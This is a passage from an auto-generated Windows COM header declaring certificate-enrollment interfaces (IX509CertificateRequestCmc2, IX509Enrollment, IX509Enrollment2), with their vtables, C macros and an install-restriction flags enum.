            /* [in] */ __RPC__in_opt ISignerCertificate *pSignerCertificate,
            /* [in] */ VARIANT_BOOL ValidateCertificateChain);
        
        END_INTERFACE
    } IX509CertificateRequestCmc2Vtbl;

    interface IX509CertificateRequestCmc2
    {
        CONST_VTBL struct IX509CertificateRequestCmc2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestCmc2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestCmc2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestCmc2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestCmc2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestCmc2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestCmc2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestCmc2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestCmc2_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestCmc2_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestCmc2_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestCmc2_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestCmc2_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestCmc2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestCmc2_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestCmc2_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestCmc2_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc2_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc2_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestCmc2_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestCmc2_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCmc2_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestCmc2_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestCmc2_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestCmc2_InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestCmc2_InitializeFromInnerRequest(This,pInnerRequest)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequest(This,pInnerRequest) ) 

#define IX509CertificateRequestCmc2_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestCmc2_get_RequesterName(This,pValue)	\
    ( (This)->lpVtbl -> get_RequesterName(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_RequesterName(This,Value)	\
    ( (This)->lpVtbl -> put_RequesterName(This,Value) ) 

#define IX509CertificateRequestCmc2_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestCmc2_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 


#define IX509CertificateRequestCmc2_InitializeFromInnerRequestTemplateName(This,pInnerRequest,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequestTemplateName(This,pInnerRequest,strTemplateName) ) 

#define IX509CertificateRequestCmc2_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_TransactionId(This,pValue)	\
    ( (This)->lpVtbl -> get_TransactionId(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_TransactionId(This,Value)	\
    ( (This)->lpVtbl -> put_TransactionId(This,Value) ) 

#define IX509CertificateRequestCmc2_get_SenderNonce(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SenderNonce(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc2_put_SenderNonce(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_SenderNonce(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc2_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_ArchivePrivateKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ArchivePrivateKey(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_ArchivePrivateKey(This,Value)	\
    ( (This)->lpVtbl -> put_ArchivePrivateKey(This,Value) ) 

#define IX509CertificateRequestCmc2_get_KeyArchivalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_KeyArchivalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc2_put_KeyArchivalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_KeyArchivalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc2_get_EncryptionAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_EncryptionAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCmc2_put_EncryptionAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_EncryptionAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_EncryptionStrength(This,pValue)	\
    ( (This)->lpVtbl -> get_EncryptionStrength(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_EncryptionStrength(This,Value)	\
    ( (This)->lpVtbl -> put_EncryptionStrength(This,Value) ) 

#define IX509CertificateRequestCmc2_get_EncryptedKeyHash(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncryptedKeyHash(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc2_get_SignerCertificates(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificates(This,ppValue) ) 


#define IX509CertificateRequestCmc2_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestCmc2_InitializeFromInnerRequestTemplate(This,pInnerRequest,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequestTemplate(This,pInnerRequest,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestCmc2_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestCmc2_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 

#define IX509CertificateRequestCmc2_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestCmc2_CheckCertificateSignature(This,pSignerCertificate,ValidateCertificateChain)	\
    ( (This)->lpVtbl -> CheckCertificateSignature(This,pSignerCertificate,ValidateCertificateChain) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestCmc2_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0086 */
/* [local] */ 

typedef 
enum InstallResponseRestrictionFlags
    {
        AllowNone	= 0,
        AllowNoOutstandingRequest	= 0x1,
        AllowUntrustedCertificate	= 0x2,
        AllowUntrustedRoot	= 0x4
    } 	InstallResponseRestrictionFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0086_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0086_v0_0_s_ifspec;

#ifndef __IX509Enrollment_INTERFACE_DEFINED__
#define __IX509Enrollment_INTERFACE_DEFINED__

/* interface IX509Enrollment */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Enrollment;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab346-217d-11da-b2a4-000e7bbb2b09")
    IX509Enrollment : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ X509CertificateEnrollmentContext Context) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplateName( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromRequest( 
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pRequest) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE CreateRequest( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Enroll( void) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InstallResponse( 
            /* [in] */ InstallResponseRestrictionFlags Restrictions,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPassword) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CreatePFX( 
            /* [in] */ __RPC__in BSTR strPassword,
            /* [in] */ PFXExportOptions ExportOptions,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Request( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Silent( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Silent( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ParentWindow( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ParentWindow( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NameValuePairs( 
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EnrollmentContext( 
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Status( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Certificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Response( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CertificateFriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_CertificateFriendlyName( 
            /* [in] */ __RPC__in BSTR strValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CertificateDescription( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_CertificateDescription( 
            /* [in] */ __RPC__in BSTR strValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RequestId( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CAConfigString( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509EnrollmentVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Enrollment * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Enrollment * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Enrollment * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Enrollment * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromRequest )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pRequest);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *CreateRequest )( 
            __RPC__in IX509Enrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *Enroll )( 
            __RPC__in IX509Enrollment * This);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InstallResponse )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ InstallResponseRestrictionFlags Restrictions,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPassword);
        
        HRESULT ( STDMETHODCALLTYPE *CreatePFX )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in BSTR strPassword,
            /* [in] */ PFXExportOptions ExportOptions,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Request )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Status )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in IX509Enrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Response )( 
            __RPC__in IX509Enrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateFriendlyName )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateFriendlyName )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateDescription )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateDescription )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestId )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CAConfigString )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509EnrollmentVtbl;

    interface IX509Enrollment
    {
        CONST_VTBL struct IX509EnrollmentVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Enrollment_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Enrollment_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Enrollment_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Enrollment_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Enrollment_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Enrollment_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Enrollment_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Enrollment_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509Enrollment_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509Enrollment_InitializeFromRequest(This,pRequest)	\
    ( (This)->lpVtbl -> InitializeFromRequest(This,pRequest) ) 

#define IX509Enrollment_CreateRequest(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRequest(This,Encoding,pValue) ) 

#define IX509Enrollment_Enroll(This)	\
    ( (This)->lpVtbl -> Enroll(This) ) 

#define IX509Enrollment_InstallResponse(This,Restrictions,strResponse,Encoding,strPassword)	\
    ( (This)->lpVtbl -> InstallResponse(This,Restrictions,strResponse,Encoding,strPassword) ) 

#define IX509Enrollment_CreatePFX(This,strPassword,ExportOptions,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreatePFX(This,strPassword,ExportOptions,Encoding,pValue) ) 

#define IX509Enrollment_get_Request(This,pValue)	\
    ( (This)->lpVtbl -> get_Request(This,pValue) ) 

#define IX509Enrollment_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509Enrollment_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509Enrollment_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509Enrollment_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509Enrollment_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 

#define IX509Enrollment_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509Enrollment_get_Status(This,ppValue)	\
    ( (This)->lpVtbl -> get_Status(This,ppValue) ) 

#define IX509Enrollment_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define IX509Enrollment_get_Response(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Response(This,Encoding,pValue) ) 

#define IX509Enrollment_get_CertificateFriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateFriendlyName(This,pValue) ) 

#define IX509Enrollment_put_CertificateFriendlyName(This,strValue)	\
    ( (This)->lpVtbl -> put_CertificateFriendlyName(This,strValue) ) 

#define IX509Enrollment_get_CertificateDescription(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateDescription(This,pValue) ) 

#define IX509Enrollment_put_CertificateDescription(This,strValue)	\
    ( (This)->lpVtbl -> put_CertificateDescription(This,strValue) ) 

#define IX509Enrollment_get_RequestId(This,pValue)	\
    ( (This)->lpVtbl -> get_RequestId(This,pValue) ) 

#define IX509Enrollment_get_CAConfigString(This,pValue)	\
    ( (This)->lpVtbl -> get_CAConfigString(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Enrollment_INTERFACE_DEFINED__ */


#ifndef __IX509Enrollment2_INTERFACE_DEFINED__
#define __IX509Enrollment2_INTERFACE_DEFINED__

/* interface IX509Enrollment2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Enrollment2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab350-217d-11da-b2a4-000e7bbb2b09")
    IX509Enrollment2 : public IX509Enrollment
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplate( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InstallResponse2( 
            /* [in] */ InstallResponseRestrictionFlags Restrictions,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPassword,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerUrl,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerID,
            /* [in] */ PolicyServerUrlFlags EnrollmentPolicyServerFlags,
            /* [in] */ X509EnrollmentAuthFlags authFlags) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyServer( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RequestIdString( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509Enrollment2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Enrollment2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Enrollment2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Enrollment2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Enrollment2 * This,
